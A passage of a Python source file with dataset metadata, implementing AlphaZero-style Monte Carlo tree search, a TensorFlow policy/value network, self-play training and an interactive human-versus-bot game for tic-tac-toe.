= [[2,2], [1,2], [0,2], [2,1], [1,1], [0,1], [2,0], [1,0], [0,0]]\n backward = [[2,2], [1,2], [0,2], [2,1], [1,1], [0,1], [2,0], [1,0], [0,0]]\n elif i == 2:\n # reflection around the axis 90 degrees clockwise from the vertical\n forward = [[2,0], [2,1], [2,2], [1,0], [1,1], [1,2], [0,0], [0,1], [0,2]]\n backward = [[2,0], [2,1], [2,2], [1,0], [1,1], [1,2], [0,0], [0,1], [0,2]]\n elif i == 3:\n # reflection around the axis 135 degrees clockwise from the vertical\n forward = [[0,0], [1,0], [2,0], [0,1], [1,1], [2,1], [0,2], [1,2], [2,2]]\n backward = [[0,0], [1,0], [2,0], [0,1], [1,1], [2,1], [0,2], [1,2], [2,2]]\n\n map_to_flat_idxs = lambda ij_pair: (3 * ij_pair[0] + ij_pair[1])\n\n forward = [map_to_flat_idxs(ij_pair) for ij_pair in forward]\n backward = [map_to_flat_idxs(ij_pair) for ij_pair in backward]\n\n return forward, backward\n\ndef get_me_a_random_transformation():\n i = np.random.randint(0,8)\n if i in range(0,4):\n forward, backward = get_me_this_reflection(i)\n else:\n i = i - 4\n forward, backward = get_me_this_rotation(i)\n\n return forward, backward\n\n\nclass Node:\n def __init__(self, s, parent_node_and_prev_action=None, is_root=False):\n # N, Q, P are vectors whose i-th coordinate corresponds to the i-th action that can be taken in state s.\n self.parent_node = None if parent_node_and_prev_action is None else parent_node_and_prev_action[0]\n self.prev_action = None if parent_node_and_prev_action is None else parent_node_and_prev_action[1]\n\n self.s = s.clone()\n self.Vs = None\n self.n = 1\n\n self.valid_actions_mask_vec = np.squeeze(np.reshape(self.get_valid_actions_mask(), [1, 9]), [0])\n self.Nas_vec = np.zeros(dtype=np.int32, shape=(9,))\n self.Was_vec = np.zeros(dtype=np.float32, shape=(9,))\n self.Qas_vec = np.zeros(dtype=np.float32, shape=(9,))\n self.Pas_vec = np.zeros(dtype=np.float32, shape=(9,))\n\n # hashtable of pointers to child nodes\n # the hashtable is keyed by integers, each representing the location of each possible move in a 1D representation of the board\n self.child_nodes = {i: None for i in range(0,9)}\n\n self.is_root = is_root\n\n def get_valid_actions_mask(self):\n if self.s.episode_done:\n return np.zeros(dtype=np.int32, shape=(3,3))\n\n bools_ = self.s.state.board == 0\n ints_ = np.array(bools_, dtype=np.int32)\n ints_ = np.reshape(ints_, [9])\n return ints_\n\n @property\n def is_leaf_node(self):\n return np.sum(self.Nas_vec) == 0 and not self.is_root\n\n @property\n def is_terminal_node(self):\n return self.s.episode_done\n\n @property\n def has_parent_node(self):\n return self.parent_node is not None\n\n def get_value_for_terminal_node(self):\n if self.is_terminal_node:\n # for terminal nodes, where game is actually over, use actual game outcome instead of neural network's value estimate\n\n env = self.s\n win = env.check_win()\n full = env.check_full()\n\n # for this implementation of tic tac toe, if terminal node involved a win, previous guy to move was the winner\n if win:\n v = -1.0\n elif full and not win:\n v = 0.0\n\n return v\n else:\n raise RuntimeError\n\n def predict_value_and_prior_vec_for_leaf_node(self, sess, f_theta):\n state = self.s.state\n state_repr = state.board * state.turn_parity.sign\n\n d_i, d_i_inverse = get_me_a_random_transformation()\n\n d_i_applied_to_state_repr = np.reshape(np.reshape(state_repr, [9])[d_i], [3,3])\n d_i_applied_to_valid_actions_mask_vec = self.valid_actions_mask_vec[d_i]\n\n state_repr_batch = np.expand_dims(d_i_applied_to_state_repr, 0)\n valid_actions_mask_batch = 
np.expand_dims(d_i_applied_to_valid_actions_mask_vec, 0)\n\n        p_vec_leaf, v_leaf = f_theta.predict(sess, state_repr_batch, valid_actions_mask_batch)\n\n        p_vec_leaf = p_vec_leaf[0, :]\n        v_leaf = v_leaf[0, 0]\n\n        p_vec_leaf = p_vec_leaf[d_i_inverse]\n\n        return p_vec_leaf, v_leaf\n\n\ndef get_me_a_tree(state):\n    tree = Node(s=state, is_root=True)\n    p_vec_leaf, v_leaf = tree.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n    tree.Pas_vec = p_vec_leaf\n    tree.Vs = v_leaf\n\n    eps = 0.25\n\n    #alpha = 0.03 # for go\n    alpha = 1.21 # for tictactoe\n\n    # per the deepmind alphazero paper, alpha is scaled in inverse proportion to avg num legal moves: \n    # so for go's alpha to be alpha = 0.03, we have 0.03 = c * 1/(362/2) for some c,\n    # and thus c = 0.03 * (362/2), \n    # so that for tictactoe, alpha is approximately [0.03 * (362/2)] / (9/2) ~= 1.21\n\n    num_valid_actions = np.sum(tree.valid_actions_mask_vec)\n    boolean_valid_actions_mask = np.reshape(np.array(tree.valid_actions_mask_vec, dtype=np.bool), [9])\n\n    idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n    idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[boolean_valid_actions_mask]\n\n    alpha_vec = alpha * np.ones(shape=(num_valid_actions,))\n\n    dirichlet_noise_within_space_of_valid_actions = np.random.dirichlet(alpha_vec)\n    dirichlet_noise_for_valid_actions_within_space_of_all_actions = np.zeros(dtype=np.float32, shape=(9,))\n    dirichlet_noise_for_valid_actions_within_space_of_all_actions[idxs_for_valid_actions_within_space_of_all_actions] = dirichlet_noise_within_space_of_valid_actions\n\n    tree.Pas_vec = eps * dirichlet_noise_for_valid_actions_within_space_of_all_actions + (1. - eps) * tree.Pas_vec\n\n    return tree\n\n\ndef run_me_a_simulation(tree, sess, f_theta):\n    node = tree\n    c_puct = np.sqrt(2.0)\n\n    # search til we reach a leaf or a terminal node\n    while not node.is_leaf_node and not node.is_terminal_node:\n        Pas_vec = node.Pas_vec\n        Qas_vec = node.Qas_vec\n        Nas_vec = node.Nas_vec\n        n = float(node.n)\n        Uas_vec = c_puct * Pas_vec * (np.sqrt(n) * np.ones(dtype=np.float32, shape=Nas_vec.shape) / (1 + Nas_vec))\n        decision_vec = Qas_vec + Uas_vec\n\n        mask = np.reshape(np.array(node.valid_actions_mask_vec, dtype=np.bool), [9])\n        idx_for_selected_action_within_space_of_valid_actions = np.argmax(decision_vec[mask])\n\n        idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n        idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[mask]\n        idx_for_selected_action_within_space_of_all_actions = idxs_for_valid_actions_within_space_of_all_actions[idx_for_selected_action_within_space_of_valid_actions]\n\n        a = idx_for_selected_action_within_space_of_all_actions\n\n        # action a leads to leaf node\n        if node.child_nodes[a] is None:\n\n            # compute leaf node state\n            cloned_env = node.s.clone()\n            cloned_env.step(move=(a // 3, a % 3), player_id=cloned_env.state.turn_parity.sign)\n\n            # construct leaf node\n            new_node = Node(s=cloned_env, parent_node_and_prev_action=(node, a))\n\n            # attach leaf node to current node\n            node.child_nodes[a] = new_node\n\n            node = new_node\n        else:\n            node = node.child_nodes[a]\n\n    # if its a leaf node that isnt a terminal state, use the neural network to fill in the value and prior\n    if node.is_leaf_node and not node.is_terminal_node:\n        p_vec_leaf, v_leaf = node.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n        node.Pas_vec = p_vec_leaf\n        node.Vs = v_leaf\n\n    # if it's a terminal state we've 
never visited before, use the actual outcome for the value\n    elif node.is_terminal_node and node.Vs is None:\n        v_leaf = node.get_value_for_terminal_node()\n        node.Vs = v_leaf\n\n    # if it's a terminal node whose value was computed on a previous simulation\n    else:\n        v_leaf = node.Vs\n\n    sign = -1.0\n\n    # backtrack and update the action values\n    while node.has_parent_node:\n        parent_node = node.parent_node\n        a = node.prev_action\n\n        N = parent_node.Nas_vec[a]\n\n        parent_node.Nas_vec[a] += 1\n        parent_node.n += 1\n        parent_node.Was_vec[a] += sign * v_leaf\n        parent_node.Qas_vec[a] = parent_node.Was_vec[a] / float(parent_node.Nas_vec[a])\n\n        node = parent_node\n\n        sign *= -1.0\n\n    return node\n\n\n\ndef run_me_the_mcts(tree, sess, f_theta, num_sims, t):\n    # t denotes the move number of the move currently being decided.\n    # when computing pi_t, the alphago zero people use tau = 1.0 early in game, and use a low temperature parameter tau for the later moves in the game.\n    # for now, we will stick with tau = 1.0 the whole game, but having t as an argument in this function makes this functionality easy to change, if we so wish.\n\n    if t == 0:\n        tau = 1.0\n    else:\n        tau = 0.33\n\n    for sim in range(0,num_sims):\n        tree = run_me_a_simulation(tree, sess, f_theta)\n\n    pi_t = np.power(tree.Nas_vec, (1.0/tau)) / np.sum(np.power(tree.Nas_vec, (1.0/tau)), keepdims=True)\n\n    return tree, pi_t\n\ndef choose_a_move(pi_t):\n    a_t = np.random.choice(9, None, p=pi_t)\n    return a_t\n\ndef set_new_root(tree, a_t, sess, f_theta):\n    if tree.child_nodes[a_t] is None:\n        cloned_env = tree.s.clone()\n        cloned_env.step(move=(a_t // 3, a_t % 3), player_id=cloned_env.state.turn_parity.sign)\n\n        # construct leaf node\n        new_node = Node(s=cloned_env, parent_node_and_prev_action=(tree, a_t))\n\n        p_vec_leaf, v_leaf = new_node.predict_value_and_prior_vec_for_leaf_node(sess, f_theta)\n        new_node.Pas_vec = p_vec_leaf\n        new_node.Vs = v_leaf\n\n        # attach leaf node to current node\n        tree.child_nodes[a_t] = new_node\n\n    tree = tree.child_nodes[a_t]\n    tree.is_root = True\n    tree.parent_node = None\n    tree.prev_action = None\n    eps = 0.25\n\n    #alpha = 0.03 # for go\n    alpha = 1.21 # for tictactoe\n\n    # per the deepmind alphazero paper, alpha is scaled in inverse proportion to avg num legal moves: \n    # so for go's alpha to be alpha = 0.03, we have 0.03 = c * 1/(362/2) for some c,\n    # and thus c = 0.03 * (362/2), \n    # so that for tictactoe, alpha is approximately [0.03 * (362/2)] / (9/2) ~= 1.21\n\n    num_valid_actions = np.sum(tree.valid_actions_mask_vec)\n    boolean_valid_actions_mask = np.reshape(np.array(tree.valid_actions_mask_vec, dtype=np.bool), [9])\n\n    idxs_for_all_actions_within_space_of_all_actions = np.arange(9)\n    idxs_for_valid_actions_within_space_of_all_actions = idxs_for_all_actions_within_space_of_all_actions[boolean_valid_actions_mask]\n\n    alpha_vec = alpha * np.ones(shape=(num_valid_actions,))\n\n    dirichlet_noise_within_space_of_valid_actions = np.random.dirichlet(alpha_vec)\n    dirichlet_noise_for_valid_actions_within_space_of_all_actions = np.zeros(dtype=np.float32, shape=(9,))\n    dirichlet_noise_for_valid_actions_within_space_of_all_actions[idxs_for_valid_actions_within_space_of_all_actions] = dirichlet_noise_within_space_of_valid_actions\n\n    tree.Pas_vec = eps * dirichlet_noise_for_valid_actions_within_space_of_all_actions + (1. 
- eps) * tree.Pas_vec\n return tree\n\n\n# in progress\ndef run_me_a_game(sess, f_theta, num_sims=100, debug=False):\n game = TicTacToe()\n tree = get_me_a_tree(game)\n train_log = []\n game_log = []\n debug_log = []\n t = 0\n\n reward = None\n\n while True:\n s_t = game.clone()\n valid_t = tree.valid_actions_mask_vec\n\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n\n Vs = tree.Vs\n Pas_vec = tree.Pas_vec\n Qas_vec = tree.Qas_vec\n Nas_vec = tree.Nas_vec\n\n a_t = choose_a_move(pi_t)\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n train_log.append((s_t, valid_t, pi_t))\n game_log.append((s_t, a_t))\n\n s_tp1, reward, episode_done = game.step(move=(a_t // 3, a_t % 3), player_id=game.state.turn_parity.sign)\n\n if debug:\n debug_log.append({\n 't': t,\n 's_t': s_t, \n 'Vs': Vs, \n 'valid_t': valid_t, \n 'Pas_vec': Pas_vec, \n 'Qas_vec': Qas_vec, \n 'Nas_vec': Nas_vec, \n 'pi_t': pi_t, \n 'a_t': a_t,\n 'r_t': reward,\n 'episode_done': episode_done})\n\n t += 1\n\n if episode_done:\n #print('episode done')\n game_log.append((s_tp1, 'game over'))\n break\n\n train_log.reverse()\n train_log = [(tuple_[0], tuple_[1], tuple_[2], ((-1.0) ** i) * reward) for i, tuple_ in enumerate(train_log, 0)]\n train_log.reverse()\n return train_log, game_log, debug_log\n\n\n\nclass NeuralNetwork:\n def __init__(self):\n self.state = tf.placeholder(tf.int32, [None, 3, 3])\n self.valid_actions_mask = tf.placeholder(tf.int32, [None, 9])\n self.pi = tf.placeholder(tf.float32, [None, 9])\n self.z = tf.placeholder(tf.float32, [None, 1])\n self.is_train = tf.placeholder(tf.bool, [])\n self.lr = tf.placeholder(tf.float32, [])\n\n with tf.variable_scope('nn'):\n board = tf.expand_dims(tf.cast(self.state, dtype=tf.float32), -1)\n\n channel_dim = 16\n\n ## residual tower\n # conv block\n conv1 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[2,2], strides=[1,1], padding='VALID', activation=None)\n conv2 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[3,1], strides=[1,1], padding='VALID', activation=None)\n conv3 = tf.layers.conv2d(board, filters=channel_dim, kernel_size=[1,3], strides=[1,1], padding='VALID', activation=None)\n flat1 = tf.reshape(conv1, [-1, 2*2*channel_dim])\n flat2 = tf.reshape(conv2, [-1, 1*3*channel_dim])\n flat3 = tf.reshape(conv3, [-1, 3*1*channel_dim])\n flat4 = tf.reshape(board, [-1, 9])\n concat1 = tf.concat([flat1, flat2, flat3, flat4], axis=1)\n elu1 = tf.nn.elu(concat1)\n\n fc2 = tf.layers.dense(elu1, units=(10*channel_dim+9), activation=None)\n elu2 = tf.nn.elu(fc2)\n fc3 = tf.layers.dense(elu2, units=(10*channel_dim+9), activation=None)\n elu3 = tf.nn.elu(fc3)\n res1 = elu1 + elu3\n\n shared_features = res1\n\n ## policy head\n policy_fc1 = tf.layers.dense(shared_features, units=(10*channel_dim), activation=None)\n policy_elu1 = tf.nn.elu(policy_fc1)\n policy_fc2 = tf.layers.dense(policy_elu1, units=(10*channel_dim), activation=None)\n policy_elu2 = tf.nn.elu(policy_fc2)\n policy_fc3 = tf.layers.dense(policy_elu2, 9, activation=None)\n logits = policy_fc3\n\n softmax_terms = tf.cast(self.valid_actions_mask, dtype=tf.float32) * tf.exp(logits)\n self.probabilities = softmax_terms / tf.reduce_sum(softmax_terms, axis=1, keep_dims=True)\n\n ## value head\n value_fc1 = tf.layers.dense(shared_features, units=(2*channel_dim), activation=None)\n value_elu1 = tf.nn.relu(value_fc1)\n value_fc2 = tf.layers.dense(value_elu1, units=(2*channel_dim), activation=None)\n value_elu2 = tf.nn.relu(value_fc2)\n value_fc3 = tf.layers.dense(value_elu2, 
units=1, activation=None)\n value_tanh = tf.nn.tanh(value_fc3)\n\n self.value = value_tanh\n\n self.mse_terms = tf.squeeze(tf.square(self.z - self.value), [1])\n self.cross_entropy_terms = -tf.reduce_sum(self.pi * tf.log(self.probabilities + 1e-8), axis=1)\n\n self.mse = tf.reduce_mean(self.mse_terms, axis=0)\n self.cross_entropy = tf.reduce_mean(self.cross_entropy_terms, axis=0)\n\n self.loss = self.mse + self.cross_entropy\n self.optimizer = tf.train.MomentumOptimizer(self.lr, momentum=0.9)\n tvars = tf.trainable_variables()\n gradients, _ = zip(*self.optimizer.compute_gradients(loss=self.loss, var_list=tvars))\n gradients, _ = tf.clip_by_global_norm(gradients, 5.0)\n self.train_op = self.optimizer.apply_gradients(zip(gradients, tvars))\n\n def predict(self, sess, state, valid_actions_mask):\n feed_dict = {\n self.state: state,\n self.valid_actions_mask: valid_actions_mask,\n self.is_train: False\n }\n p_theta, v_theta = sess.run([self.probabilities, self.value], feed_dict=feed_dict)\n return p_theta, v_theta\n\n def train(self, sess, state, valid_actions_mask, pi, z, lr):\n feed_dict = {\n self.state: state,\n self.valid_actions_mask: valid_actions_mask,\n self.pi: pi,\n self.z: z,\n self.is_train: True,\n self.lr: lr\n }\n _, loss, mse, cross_entropy = sess.run([self.train_op, self.loss, self.mse, self.cross_entropy], feed_dict=feed_dict)\n return loss, mse, cross_entropy\n\n\nf_theta = NeuralNetwork()\n\ngame.reset()\n\ninit_op = tf.global_variables_initializer()\nsess = tf.Session()\n\nsess.run(init_op)\n\n# tree = get_me_a_tree(game)\n# tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=1000)\n\ntrain_log_before, game_log_before, debug_log_before = run_me_a_game(sess, f_theta, num_sims=100, debug=True)\n\n\ndef training_step(sess, f_theta, lr, num_games=256, batch_size=64, num_sims=100, gradient_steps=1, verbose=False):\n train_log_combined = []\n for _ in range(0, num_games):\n train_log, _, _ = run_me_a_game(sess, f_theta, num_sims=num_sims)\n train_log_combined.extend(train_log)\n\n shuffle(train_log_combined)\n\n for i in range(0, (len(train_log_combined) - (len(train_log_combined) % batch_size)) // batch_size):\n state_batch = []\n valid_actions_mask_batch = []\n pi_batch = []\n z_batch = []\n\n for j in range(0, batch_size):\n if verbose:\n print('i,j: {},{}'.format(i, j))\n row = train_log_combined[batch_size * i + j]\n s_t, valid_t, pi_t, z_t = row[0], row[1], row[2], row[3]\n\n state_repr_t = s_t.state.board * s_t.state.turn_parity.sign\n \n state_batch.append(state_repr_t)\n valid_actions_mask_batch.append(valid_t)\n pi_batch.append(pi_t)\n z_batch.append([z_t])\n\n state_batch = np.array(state_batch)\n valid_actions_mask_batch = np.array(valid_actions_mask_batch)\n pi_batch = np.array(pi_batch)\n z_batch = np.array(z_batch)\n\n loss, mse, cross_entropy = f_theta.train(sess, state_batch, valid_actions_mask_batch, pi_batch, z_batch, lr)\n\n print('loss: {}... mse: {}... 
cross_entropy: {}'.format(loss, mse, cross_entropy))\n\n if i == gradient_steps - 1:\n break\n\n\ndef training_loop(sess, f_theta, mode='basic'):\n settings = {\n 'debug': {\n 'steps': [1, 1, 1],\n 'games': 64,\n 'sims': 20\n },\n 'basic': {\n 'steps': [20, 10, 10],\n 'games': 256,\n 'sims': 100\n },\n 'standard': {\n 'steps': [100, 50, 50],\n 'games': 256,\n 'sims': 100\n }\n }\n i1, i2, i3 = settings[mode]['steps']\n num_games = settings[mode]['games']\n num_sims = settings[mode]['sims']\n\n for _ in range(0, i1):\n training_step(sess, f_theta, lr=0.01, num_games=num_games, num_sims=num_sims)\n for _ in range(0, i2):\n training_step(sess, f_theta, lr=0.001, num_games=num_games, num_sims=num_sims)\n for _ in range(0, i3):\n training_step(sess, f_theta, lr=0.0001, num_games=num_games, num_sims=num_sims)\n\n\n\n\n\ndef play_me_a_game(sess, f_theta, num_sims=100, human_player_id=None):\n assert human_player_id is None or human_player_id in [-1, 1]\n if human_player_id is None:\n coin_toss = np.random.randint(2)\n called_it = input(\"coin toss for the first move. call it 0 or 1.\\n> \")\n time.sleep(3)\n print('\\n')\n\n if int(called_it) == coin_toss:\n human_player_id = 1\n remark = ', you called it right!'\n else:\n human_player_id = -1\n remark = '...'\n \n print('coin toss was {}{}\\n'.format(coin_toss, remark))\n print('you play as {}'.format(human_player_id))\n time.sleep(2)\n\n print('player 1 goes first.')\n time.sleep(1)\n\n game = TicTacToe()\n tree = get_me_a_tree(game)\n\n episode_done = False\n\n t = 0\n\n while not episode_done:\n\n if game.state.turn_parity.sign == human_player_id:\n print('_____________\\nnew turn.\\n')\n print(game)\n move = input(\"\\nit's your turn. where would you like to go? enter a tuple (i,j)\\n> \")\n move = move.strip()\n time.sleep(2)\n\n if move == 'q' or move == 'quit' or move == 'Q':\n print('human has quit the game.')\n break\n\n if len(move) == 0:\n print('input does not conform with required format for a move.')\n continue\n\n if move[0] != '(' or move[-1] != ')':\n print('input does not conform with required format for a move.')\n continue\n\n coords = move[1:-1].strip('\\n').strip(' ').split(',')\n coords = [str(s.strip(' ')) for s in coords]\n if len(coords) != 2:\n print('input does not conform with required format for a move.')\n continue\n\n coord0 = coords[0]\n coord1 = coords[1]\n bool0 = coord0 in [str(i) for i in range(0,3)]\n bool1 = coord1 in [str(i) for i in range(0,3)]\n if not bool0 or not bool1:\n print('input coordinates not in valid coordinate set.')\n continue\n\n move = (int(coord0), int(coord1))\n\n if not game.move_is_valid(move=move, player_id=game.state.turn_parity.sign):\n print('move is not valid!')\n continue\n\n # in current implementation, the bot is gonna run some simulations every turn, even if it's the human's move.\n # because, why not increase our visitation counts?\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n a_t = 3 * move[0] + move[1]\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n else:\n print('_____________\\nnew turn.\\n')\n print(game)\n print(\"\\nit's the bot's turn. 
where will it go?\")\n\n tree, pi_t = run_me_the_mcts(tree, sess, f_theta, num_sims=num_sims, t=t)\n a_t = choose_a_move(pi_t)\n tree = set_new_root(tree, a_t, sess, f_theta)\n\n print('the bot played at ({},{}).\\n'.format(a_t // 3, a_t % 3))\n time.sleep(3)\n\n t += 1\n\n s_tp1, reward, episode_done = game.step(move=(a_t // 3, a_t % 3), player_id=game.state.turn_parity.sign)\n if episode_done:\n time.sleep(3)\n print('_____________\\ngame over.\\n')\n print(game)\n print('\\n')\n print('thanks for the game.')\n print('good game.')\n print('\\n')\n break\n\n\nmode_selector = 'standard'\ntraining_loop(sess, f_theta, mode=mode_selector)\n\ntrain_log_after, game_log_after, debug_log_after = run_me_a_game(sess, f_theta, num_sims=1000, debug=True)\n\n\n#play_me_a_game(sess, f_theta, num_sims=1600)\n", "sub_path": "mcts_tictactoe.py", "file_name": "mcts_tictactoe.py", "file_ext": "py", "file_size_in_byte": 29280, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.namedtuple", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 106, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 250, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 259, "usage_type": 
"call"}, {"api_name": "numpy.reshape", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 326, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.random.dirichlet", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 333, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 334, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 436, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 469, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 471, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 474, "usage_type": "call"}, {"api_name": "numpy.random.dirichlet", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 476, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 477, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 544, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 544, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 545, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 545, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 546, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 546, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 547, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 547, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 548, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 548, "usage_type": "attribute"}, 
{"api_name": "tensorflow.placeholder", "line_number": 549, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 549, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 551, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 552, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 552, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 558, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 559, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 559, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 560, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 560, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 561, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 562, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 564, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 565, "usage_type": "call"}, {"api_name": "tensorflow.nn.elu", "line_number": 566, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 566, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 568, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 569, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 569, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 570, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 571, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 577, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 577, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 578, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 579, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 579, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.elu", "line_number": 580, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 580, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 581, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 581, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 584, "usage_type": "call"}, {"api_name": "tensorflow.float32", 